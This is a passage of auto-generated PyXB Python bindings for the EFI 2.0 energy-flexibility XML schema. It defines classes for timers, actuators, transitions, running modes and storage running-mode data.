__sequentialProfile = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfile'), 'sequentialProfile', '__httpwww_flexiblepower_orgefi_2_SequentialProfiles_httpwww_flexiblepower_orgefi_2sequentialProfile', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 372, 3), )
sequentialProfile = property(__sequentialProfile.value, __sequentialProfile.set, None, None)
_ElementMap.update({
__sequentialProfile.name() : __sequentialProfile
})
_AttributeMap.update({
})
_module_typeBindings.SequentialProfiles = SequentialProfiles
Namespace.addCategoryObject('typeBinding', 'SequentialProfiles', SequentialProfiles)
# Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileInstruction with content type ELEMENT_ONLY
class SequentialProfileInstruction (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileInstruction with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SequentialProfileInstruction')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 387, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}sequenceNr uses Python identifier sequenceNr
__sequenceNr = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequenceNr'), 'sequenceNr', '__httpwww_flexiblepower_orgefi_2_SequentialProfileInstruction_httpwww_flexiblepower_orgefi_2sequenceNr', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 389, 3), )
sequenceNr = property(__sequenceNr.value, __sequenceNr.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}alternativeNr uses Python identifier alternativeNr
__alternativeNr = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'alternativeNr'), 'alternativeNr', '__httpwww_flexiblepower_orgefi_2_SequentialProfileInstruction_httpwww_flexiblepower_orgefi_2alternativeNr', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 390, 3), )
alternativeNr = property(__alternativeNr.value, __alternativeNr.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}startTime uses Python identifier startTime
__startTime = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'startTime'), 'startTime', '__httpwww_flexiblepower_orgefi_2_SequentialProfileInstruction_httpwww_flexiblepower_orgefi_2startTime', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 391, 3), )
startTime = property(__startTime.value, __startTime.set, None, None)
_ElementMap.update({
__sequenceNr.name() : __sequenceNr,
__alternativeNr.name() : __alternativeNr,
__startTime.name() : __startTime
})
_AttributeMap.update({
})
_module_typeBindings.SequentialProfileInstruction = SequentialProfileInstruction
Namespace.addCategoryObject('typeBinding', 'SequentialProfileInstruction', SequentialProfileInstruction)
# Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileInstructions with content type ELEMENT_ONLY
class SequentialProfileInstructions (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}SequentialProfileInstructions with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'SequentialProfileInstructions')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 394, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}sequentialProfileInstruction uses Python identifier sequentialProfileInstruction
__sequentialProfileInstruction = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'sequentialProfileInstruction'), 'sequentialProfileInstruction', '__httpwww_flexiblepower_orgefi_2_SequentialProfileInstructions_httpwww_flexiblepower_orgefi_2sequentialProfileInstruction', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 396, 3), )
sequentialProfileInstruction = property(__sequentialProfileInstruction.value, __sequentialProfileInstruction.set, None, None)
_ElementMap.update({
__sequentialProfileInstruction.name() : __sequentialProfileInstruction
})
_AttributeMap.update({
})
_module_typeBindings.SequentialProfileInstructions = SequentialProfileInstructions
Namespace.addCategoryObject('typeBinding', 'SequentialProfileInstructions', SequentialProfileInstructions)
# Complex type {http://www.flexiblepower.org/efi-2}Actuator with content type ELEMENT_ONLY
class Actuator (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}Actuator with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Actuator')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 423, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}supportedCommodity uses Python identifier supportedCommodity
__supportedCommodity = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'supportedCommodity'), 'supportedCommodity', '__httpwww_flexiblepower_orgefi_2_Actuator_httpwww_flexiblepower_orgefi_2supportedCommodity', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 425, 3), )
supportedCommodity = property(__supportedCommodity.value, __supportedCommodity.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpwww_flexiblepower_orgefi_2_Actuator_httpwww_flexiblepower_orgefi_2id', pyxb.binding.datatypes.int, required=True)
__id._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 427, 2)
__id._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 427, 2)
id = property(__id.value, __id.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}label uses Python identifier label
__label = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'label'), 'label', '__httpwww_flexiblepower_orgefi_2_Actuator_httpwww_flexiblepower_orgefi_2label', pyxb.binding.datatypes.string)
__label._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 428, 2)
__label._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 428, 2)
label = property(__label.value, __label.set, None, None)
_ElementMap.update({
__supportedCommodity.name() : __supportedCommodity
})
_AttributeMap.update({
__id.name() : __id,
__label.name() : __label
})
_module_typeBindings.Actuator = Actuator
Namespace.addCategoryObject('typeBinding', 'Actuator', Actuator)
# Complex type {http://www.flexiblepower.org/efi-2}Actuators with content type ELEMENT_ONLY
class Actuators (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}Actuators with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Actuators')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 430, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}actuator uses Python identifier actuator
__actuator = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'actuator'), 'actuator', '__httpwww_flexiblepower_orgefi_2_Actuators_httpwww_flexiblepower_orgefi_2actuator', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 432, 3), )
actuator = property(__actuator.value, __actuator.set, None, None)
_ElementMap.update({
__actuator.name() : __actuator
})
_AttributeMap.update({
})
_module_typeBindings.Actuators = Actuators
Namespace.addCategoryObject('typeBinding', 'Actuators', Actuators)
# Complex type {http://www.flexiblepower.org/efi-2}Timer with content type EMPTY
class Timer (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}Timer with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Timer')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 435, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpwww_flexiblepower_orgefi_2_Timer_httpwww_flexiblepower_orgefi_2id', pyxb.binding.datatypes.int, required=True)
__id._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 436, 2)
__id._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 436, 2)
id = property(__id.value, __id.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}label uses Python identifier label
__label = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'label'), 'label', '__httpwww_flexiblepower_orgefi_2_Timer_httpwww_flexiblepower_orgefi_2label', pyxb.binding.datatypes.string, required=True)
__label._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 437, 2)
__label._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 437, 2)
label = property(__label.value, __label.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}duration uses Python identifier duration
__duration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'duration'), 'duration', '__httpwww_flexiblepower_orgefi_2_Timer_httpwww_flexiblepower_orgefi_2duration', pyxb.binding.datatypes.duration, required=True)
__duration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 438, 2)
__duration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 438, 2)
duration = property(__duration.value, __duration.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__id.name() : __id,
__label.name() : __label,
__duration.name() : __duration
})
_module_typeBindings.Timer = Timer
Namespace.addCategoryObject('typeBinding', 'Timer', Timer)
# Complex type {http://www.flexiblepower.org/efi-2}Timers with content type ELEMENT_ONLY
class Timers (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}Timers with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Timers')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 440, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}timer uses Python identifier timer
__timer = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timer'), 'timer', '__httpwww_flexiblepower_orgefi_2_Timers_httpwww_flexiblepower_orgefi_2timer', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 442, 3), )
timer = property(__timer.value, __timer.set, None, None)
_ElementMap.update({
__timer.name() : __timer
})
_AttributeMap.update({
})
_module_typeBindings.Timers = Timers
Namespace.addCategoryObject('typeBinding', 'Timers', Timers)
# Complex type {http://www.flexiblepower.org/efi-2}Transitions with content type ELEMENT_ONLY
class Transitions (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}Transitions with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Transitions')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 445, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}transition uses Python identifier transition
__transition = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'transition'), 'transition', '__httpwww_flexiblepower_orgefi_2_Transitions_httpwww_flexiblepower_orgefi_2transition', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 447, 3), )
transition = property(__transition.value, __transition.set, None, None)
_ElementMap.update({
__transition.name() : __transition
})
_AttributeMap.update({
})
_module_typeBindings.Transitions = Transitions
Namespace.addCategoryObject('typeBinding', 'Transitions', Transitions)
# Complex type {http://www.flexiblepower.org/efi-2}TimerReferences with content type ELEMENT_ONLY
class TimerReferences (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}TimerReferences with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'TimerReferences')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 450, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}timerReference uses Python identifier timerReference
__timerReference = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'timerReference'), 'timerReference', '__httpwww_flexiblepower_orgefi_2_TimerReferences_httpwww_flexiblepower_orgefi_2timerReference', True, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 452, 3), )
timerReference = property(__timerReference.value, __timerReference.set, None, None)
_ElementMap.update({
__timerReference.name() : __timerReference
})
_AttributeMap.update({
})
_module_typeBindings.TimerReferences = TimerReferences
Namespace.addCategoryObject('typeBinding', 'TimerReferences', TimerReferences)
# Complex type [anonymous] with content type EMPTY
class CTD_ANON_9 (pyxb.binding.basis.complexTypeDefinition):
"""Complex type [anonymous] with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = False
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 453, 4)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}timerId uses Python identifier timerId
__timerId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'timerId'), 'timerId', '__httpwww_flexiblepower_orgefi_2_CTD_ANON_9_httpwww_flexiblepower_orgefi_2timerId', pyxb.binding.datatypes.int, required=True)
__timerId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 454, 5)
__timerId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 454, 5)
timerId = property(__timerId.value, __timerId.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__timerId.name() : __timerId
})
_module_typeBindings.CTD_ANON_9 = CTD_ANON_9
# Complex type {http://www.flexiblepower.org/efi-2}Transition with content type ELEMENT_ONLY
class Transition (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}Transition with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Transition')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 459, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}startTimers uses Python identifier startTimers
__startTimers = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'startTimers'), 'startTimers', '__httpwww_flexiblepower_orgefi_2_Transition_httpwww_flexiblepower_orgefi_2startTimers', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 461, 3), )
startTimers = property(__startTimers.value, __startTimers.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}blockingTimers uses Python identifier blockingTimers
__blockingTimers = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'blockingTimers'), 'blockingTimers', '__httpwww_flexiblepower_orgefi_2_Transition_httpwww_flexiblepower_orgefi_2blockingTimers', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 462, 3), )
blockingTimers = property(__blockingTimers.value, __blockingTimers.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}fromRunningModeId uses Python identifier fromRunningModeId
__fromRunningModeId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fromRunningModeId'), 'fromRunningModeId', '__httpwww_flexiblepower_orgefi_2_Transition_httpwww_flexiblepower_orgefi_2fromRunningModeId', pyxb.binding.datatypes.int, required=True)
__fromRunningModeId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 464, 2)
__fromRunningModeId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 464, 2)
fromRunningModeId = property(__fromRunningModeId.value, __fromRunningModeId.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}toRunningModeId uses Python identifier toRunningModeId
__toRunningModeId = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'toRunningModeId'), 'toRunningModeId', '__httpwww_flexiblepower_orgefi_2_Transition_httpwww_flexiblepower_orgefi_2toRunningModeId', pyxb.binding.datatypes.int, required=True)
__toRunningModeId._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 465, 2)
__toRunningModeId._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 465, 2)
toRunningModeId = property(__toRunningModeId.value, __toRunningModeId.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}transitionCost uses Python identifier transitionCost
__transitionCost = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'transitionCost'), 'transitionCost', '__httpwww_flexiblepower_orgefi_2_Transition_httpwww_flexiblepower_orgefi_2transitionCost', pyxb.binding.datatypes.double)
__transitionCost._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 466, 2)
__transitionCost._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 466, 2)
transitionCost = property(__transitionCost.value, __transitionCost.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}transitionDuration uses Python identifier transitionDuration
__transitionDuration = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'transitionDuration'), 'transitionDuration', '__httpwww_flexiblepower_orgefi_2_Transition_httpwww_flexiblepower_orgefi_2transitionDuration', pyxb.binding.datatypes.duration)
__transitionDuration._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 467, 2)
__transitionDuration._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 467, 2)
transitionDuration = property(__transitionDuration.value, __transitionDuration.set, None, None)
_ElementMap.update({
__startTimers.name() : __startTimers,
__blockingTimers.name() : __blockingTimers
})
_AttributeMap.update({
__fromRunningModeId.name() : __fromRunningModeId,
__toRunningModeId.name() : __toRunningModeId,
__transitionCost.name() : __transitionCost,
__transitionDuration.name() : __transitionDuration
})
_module_typeBindings.Transition = Transition
Namespace.addCategoryObject('typeBinding', 'Transition', Transition)
# Complex type {http://www.flexiblepower.org/efi-2}RunningMode with content type EMPTY
class RunningMode (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}RunningMode with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = True
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'RunningMode')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 573, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}id uses Python identifier id
__id = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'id'), 'id', '__httpwww_flexiblepower_orgefi_2_RunningMode_httpwww_flexiblepower_orgefi_2id', pyxb.binding.datatypes.int, required=True)
__id._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 574, 2)
__id._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 574, 2)
id = property(__id.value, __id.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}label uses Python identifier label
__label = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'label'), 'label', '__httpwww_flexiblepower_orgefi_2_RunningMode_httpwww_flexiblepower_orgefi_2label', pyxb.binding.datatypes.string, required=True)
__label._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 575, 2)
__label._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 575, 2)
label = property(__label.value, __label.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__id.name() : __id,
__label.name() : __label
})
_module_typeBindings.RunningMode = RunningMode
Namespace.addCategoryObject('typeBinding', 'RunningMode', RunningMode)
# Complex type {http://www.flexiblepower.org/efi-2}StorageRunningModeElement with content type EMPTY
class StorageRunningModeElement (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}StorageRunningModeElement with content type EMPTY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_EMPTY
_Abstract = True
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageRunningModeElement')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 577, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Attribute {http://www.flexiblepower.org/efi-2}fillLevelLowerBound uses Python identifier fillLevelLowerBound
__fillLevelLowerBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fillLevelLowerBound'), 'fillLevelLowerBound', '__httpwww_flexiblepower_orgefi_2_StorageRunningModeElement_httpwww_flexiblepower_orgefi_2fillLevelLowerBound', pyxb.binding.datatypes.double, required=True)
__fillLevelLowerBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 578, 2)
__fillLevelLowerBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 578, 2)
fillLevelLowerBound = property(__fillLevelLowerBound.value, __fillLevelLowerBound.set, None, None)
# Attribute {http://www.flexiblepower.org/efi-2}fillLevelUpperBound uses Python identifier fillLevelUpperBound
__fillLevelUpperBound = pyxb.binding.content.AttributeUse(pyxb.namespace.ExpandedName(Namespace, 'fillLevelUpperBound'), 'fillLevelUpperBound', '__httpwww_flexiblepower_orgefi_2_StorageRunningModeElement_httpwww_flexiblepower_orgefi_2fillLevelUpperBound', pyxb.binding.datatypes.double, required=True)
__fillLevelUpperBound._DeclarationLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 579, 2)
__fillLevelUpperBound._UseLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 579, 2)
fillLevelUpperBound = property(__fillLevelUpperBound.value, __fillLevelUpperBound.set, None, None)
_ElementMap.update({
})
_AttributeMap.update({
__fillLevelLowerBound.name() : __fillLevelLowerBound,
__fillLevelUpperBound.name() : __fillLevelUpperBound
})
_module_typeBindings.StorageRunningModeElement = StorageRunningModeElement
Namespace.addCategoryObject('typeBinding', 'StorageRunningModeElement', StorageRunningModeElement)
# Complex type {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData with content type ELEMENT_ONLY
class StorageContinuousRunningModeData (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://www.flexiblepower.org/efi-2}StorageContinuousRunningModeData with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = True
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'StorageContinuousRunningModeData')
_XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 606, 1)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://www.flexiblepower.org/efi-2}fillingRate uses Python identifier fillingRate
__fillingRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'fillingRate'), 'fillingRate', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2fillingRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 608, 3), )
fillingRate = property(__fillingRate.value, __fillingRate.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}runningCost uses Python identifier runningCost
__runningCost = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'runningCost'), 'runningCost', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2runningCost', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 609, 3), )
runningCost = property(__runningCost.value, __runningCost.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}electricalPower uses Python identifier electricalPower
__electricalPower = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'electricalPower'), 'electricalPower', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2electricalPower', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 610, 3), )
electricalPower = property(__electricalPower.value, __electricalPower.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}gasFlowRate uses Python identifier gasFlowRate
__gasFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'gasFlowRate'), 'gasFlowRate', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2gasFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 611, 3), )
gasFlowRate = property(__gasFlowRate.value, __gasFlowRate.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatTemperature uses Python identifier heatTemperature
__heatTemperature = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatTemperature'), 'heatTemperature', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2heatTemperature', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 612, 3), )
heatTemperature = property(__heatTemperature.value, __heatTemperature.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatFlowRate uses Python identifier heatFlowRate
__heatFlowRate = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'heatFlowRate'), 'heatFlowRate', '__httpwww_flexiblepower_orgefi_2_StorageContinuousRunningModeData_httpwww_flexiblepower_orgefi_2heatFlowRate', False, pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 613, 3), )
heatFlowRate = property(__heatFlowRate.value, __heatFlowRate.set, None, None)
# Element {http://www.flexiblepower.org/efi-2}heatThermalPower uses Python identifier heatThermalPower
